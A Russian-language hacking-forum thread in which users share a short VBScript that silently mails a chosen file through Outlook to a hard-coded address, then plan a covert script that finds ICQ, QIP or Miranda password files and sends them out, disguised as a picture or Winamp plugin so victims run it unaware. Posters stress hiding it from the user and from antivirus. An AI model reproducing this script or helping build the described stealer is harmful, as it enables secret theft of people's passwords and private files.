terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » Отпаравка файлов на E-mail.


Отпаравка файлов на E-mail.

Сообщений 1 страница 20 из 22

1

Есть более сотни способов. Самый простой, если у чела есть Outlook.

On Error Resume Next
Dim OutlookObject, OutMail
Set OutlookObject = CreateObject("Outlook.Application")
Set OutMail = OutlookObject.CreateItem(0)
OutMail.to = "Yours E-mail"
OutMail.Subject = "Тема сообщения."
OutMail.Body = "Тело сообщения."
OutMail.Attachments.Add("Путь к прикрепляемому файлу.")
OutMail.Send

P.S. Остальные сложнее и если чел не знает VBS - это будет зря набранный пост.

-1

2

Можно даже через консоль отправить.

0

3

Archangel а не проще жмянуть кнопку Attach?

0

4

ребят! смотрите нам надо попробовать написать скрипт на VBS который бы:
1. проверял какой клиент стоит на компе у чела миранда, квип, ася...
2. определял где именно...
3. находил нужный файл
4. отправлял его/его содержимое на мыло указанное в скрипте...

0

5

popoffka написал(а):

Archangel а не проще жмянуть кнопку Attach?

Ты о чем? Вручную, что ли. (Эмуляцией нажатия клавиш?) Тогда не получится скрыть это от пользователя.  :cool:

0

6

ozia
идея харошая...
но вот только 1ое ненуно.
Мы всёравно по файлу сможем определить какой это клиент.
Самое трудное - узнать где стоит клиент

0

7

popoffka написал(а):

Мы всёравно по файлу сможем определить какой это клиент.

у каждого клиента разные файлы... и надо знать название файла что даже в какой-то степени облегчит поиск его... лучше искать когда ты знаешь что ищещь...

0

8

ozia тут ты прав...
я только знаю что у миранды это файл "любое_название.dat"(тоесть найти его будет трудно), а у кипа инфиума этот файл дето далеко в Application Data/QIP/Profiles

0

9

я смотрел разные клиенты...
неважно нам где файл скрыт... нам надо решить другое... будем братся за это дело или нет?

0

10

Ozia

Это достаточно просто - нужно узнать расширение или название файлов в которых храняться пароли для аськи, составить скрипт, который:

- найдет файл.
- отправит его на майл.

Найти файл, даже проще чем отправить. А насчет браться или нет - скрипт используется теми кому надо.

P.S. Надо чтобы каждый хотя бы попробовал сам написать. Просто выложить - это банально.

0

11

я думаю врятли все смогут написать...
я думаю мы должны подать пример...
готовый скрипт и подробное обьяснение что и к чему...
тогда почитав ВНИМАТЕЛЬНО все поймут (если конечно будут читать предыдущие статьи) и у кого-то может даже появится идея усовершенствования!кстати я думаю что это если работать будет то уверен что многие будут им пользоватся! прикинь! скрипт который:
1. не палится!
2. достаточно послать его по асе под картиночкой или еще чем угодно) плагин для винампа... там или еще что-то... И ГОТОВЫЙ ПАСС У НАС НА МЫЛЕ!
3. не надо компилировать!
4. не надо криптовать!
а ведь пароли так можно забирать не только от ась ;)

0

12

Да,но чтоб понять сначала нужно выучить язык,поэтому не все поймут,втом числе и я,большинство скопируют,это ко мне не относ.Вот в чем прикол!

0

13

скопировать это может каждый... а вот кому это надо тот выучит и розберет его как пример!!! а потом уже скопирует...
мы тут вроде не в школу играем) каждый делает что считает нужным! "хочешь - на! не хочешь - не надо..."
наше дело предложить! мы дадим материал а как им пользоватся (учить/копировать) решать им...
да и в том что скопируют ничего плохого нет ^_^
скопируют и на другом сайте скажут "а вот на терминале есть такой класный скрипт! я скачал и всё как по маслу!"

0

14

:rtfm: Я вот думаю, что S@nchez117 во многом прав. Да и надо сначала язык выучить, а потом и в лес заходить. А про скрипт, так это тема В ЦЕЛОМ - Глобальная. Вот скажем сам он очень простой. Но кто тебе сказал, что он беспалевный и безопасный. А во вторых, - как ты собираешься его распространять, я вот не много видел UsВерей, которые запускают всякие файлы пришедшие с почтой. (Особенно, когда антивирусы его замечают).

P.S. У всех нормальных хакеров, есть скрипт (есть и у меня  :cool:  ...), который делает это незаметно, но секреты остаются секретами в большинстве случаев. И что бы его узнать - надо, правильно - выучить язык (ну и соображения  :O ...).

Проблемы сего варианта:

- нет шифрования
- отсталый механизм
- отсутствие половых органов (это я о размножении)

                                                    и т.д.        ........................................................................................  :cool:

0

15

нам не надо пока что размножатся!
этот форум не для того что б секретом похвастатся! а для того что б выложить какой-то секрет...
я думаю что это и есть вариант обучения!
с маленького текста и до полного усовершенствования! а вот учить язык это долго... я думаю мы так можем помочь в обучении!
знаешь я думаю что мало кто как я скачал с указанной тобой ссылки книгу розпечатал (114страниц) и начал читать!!!

0

16

Я рад.

Хакер, есть программист...

0

17

Archangel ну так что выложишь секрет?

0

18

Я придумал если обучение то можно его написать и к каждой команде пояснения,тольк от них тольку будет все ровно только тем кто язык знает!

0

19

;)  Выложу, но без настроек и чуть позже. А то занят немного.  ;)

0

20

Значит нужен просто скрипт, отсылающий файл из аси на e-mail. Всё ?

0


Вы здесь » terminal-s52 » Хакинг » Отпаравка файлов на E-mail.